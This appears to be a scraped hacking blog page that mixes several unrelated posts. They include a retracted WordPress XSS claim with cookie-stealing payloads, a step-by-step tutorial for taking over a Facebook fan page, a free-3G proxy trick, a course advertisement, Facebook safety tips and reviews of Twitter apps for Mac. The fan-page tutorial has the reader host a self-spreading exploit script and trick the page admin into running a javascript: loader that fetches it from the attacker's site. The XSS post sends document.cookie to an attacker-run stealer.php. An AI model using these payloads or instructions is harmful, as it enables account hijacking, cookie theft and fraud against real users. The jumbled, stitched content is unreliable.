Dear Friends,
My earlier post about the XSS vulnerability in WordPress 3.2.1 turned out to be a False Alarm. WordPress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.
But now I am glad that WordPress is safe. 
Update: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details Click Here
Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.
Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection
Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>
Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>
Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>
Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did 
In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.
According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24×7 to make it as secure as possible but the hackers are also working 24×7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.
Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of “A beginners Guide To Ethical Hacking”, has the answer to your question with his newly created “Facebook Hacking Course“.
Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.
Now before you make your decision lets hear some words from Rafay: “Friends, if you ask me “Is Facebook safe?” my answer would be “Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.”
Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.
How to get the Facebook Hacking Course?
You can get this Facebook hacking course from Here.
Hello Friends,
Are you tired of using the low speed 2G service? I know your answer is ‘YES’. We all want to lay our hands on the latest high speed 3G service which gives a download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.
- Name : Tata Docomo or any
- Access Point ( APN ) – tata.docomo.dive.in
- Homepage : www.google.com or any
- Proxy : 202.87.41.147
- Proxy Port : 8080
- Username : leave blank
- Password : leave blank
- Set Divein Settings as Default Settings For Opera Mini
- Set http in Custom Field in your Opera Mini handler
- Set Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
- Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)
Hello Friends,
We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares.
Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. You may test it on other P2P softwares and let us know about your experience
Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming process. Its better to avoid spam messages and trojan viruses in the first place.
1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.
2. Try to avoid Links and videos with Catchy words like “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.
3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.
4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.
5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.
6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.
These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.
If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users in form of comments so that others don’t fall victim of it.
Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.
Now lets start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
1. Download the exploit from this Link.
2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.
3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.
4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)
5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:
www.yoursite.0fess.net/booster.js
6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.
javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)
Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.
About the author:
Wamiq Ali is a tech. lover and a hacker,this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at www.hackersthirst.com.
Hello Friends,
The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive and post Tweets from your desktop without visiting your Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market. Earlier I had compiled a list of 20 Best Twitter Desktop Apps for Windows. Today I give you 9 Best Twitter Apps for Mac.
This just-for-Mac app is a favorite of many because it supports Twitter, Facebook, Flickr integration, feed reading with Google Reader and internet trend watching with Reddit and Digg . Keyboard shortcuts, hotkeys, Instapaper integration, and photo uploads to Flickr and Facebook make EventBox pretty nifty. It’s also got a very slick interface with a navigation menu on the left-hand side.
This app is incredibly appealing for its dead simple, single column interface and respectable feature set. We, of course, love the multiple account support, but also appreciate saved searches, quick access to view followers and following, and tweet options to link to tweet, copy tweet, or copy tweet URL. There’s also an accompanying iPhone app, which syncs with the desktop version and greatly improves the app’s relevance.
This really sophisticated Mac app should be more than enough for any and all of your Twitter needs. You’ve got access to your followers and friends, custom groups, search (integrated with FriendFeed and One Riot), trends, tr.im and pic.im integration, multiple accounts, Ping .fm integration, filters, and three view options for a one or many column view of tweets.
Sideline is just a search and trending topic app from Yahoo, but it does a darn good job at satisfying those specific needs. You can view current Twitter trends, select to see the three latest tweets or pop out as its own saved search, and create custom search groups as tabs.
5. Skimmer:
It’s hard not to love this app. Not only is it beautiful to look at it, but it also tracks your favorite social sites. Skimmer’s certainly not an application for the social media beginner, but power users of Facebook, Flickr, YouTube, Blogger, and Twitter, will appreciate the aggregation of content, filtering options, view types, and enhanced content viewing experience.
A full-featured Twitter client which is available in free ad supported and ad-free versions. This Desktop app lets you view not only the tweets but also the entire conversation history leading to that tweet. It provides you with an independent compose windows that stay out of your way until you need them. Tweetie for Mac also has search trends to let you find out the hottest trend in Twitter. Other features include threaded DMs, user details, torn off search, bookmarklet, and preferences.
Twibble is a bit of a riddle. It’s not a bad app when it comes to feature set, but it’s also not the most intuitive. You can manage multiple accounts, but all tweets are merged together in one stream. You can reply, DM, fav, RT, and copy tweets, but you’ll have to hover over the tweet to even know those behaviors are possible. You can also use keyboard shortcuts, filter your tweets for keywords, or conduct searches that open up in new windows, but Twibble just doesn’t seem to flow as easily as we’d like it to.
Lets you both read and publish posts or “tweets” using a clean and concise user interface designed to take up a minimum of real estate on your Mac’s desktop. The app shows a scrolling list of the latest tweets from your friends, or public feeds. Its features include multiple Twitter account support, auto refreshing, inline display of replies and DMs, shows no. of unread tweets, quickly delete tweets, auto show/hide new tweets, single click access to user pages and more.
This app isn’t known for its sophistication or advanced Twitter functionality. TwitterPod is a basic single column Twitter app with an inline browser and the ability to filter for just tweets with links. Its heyday has long since passed, but original fan boys and girls may still be using this for their twittering.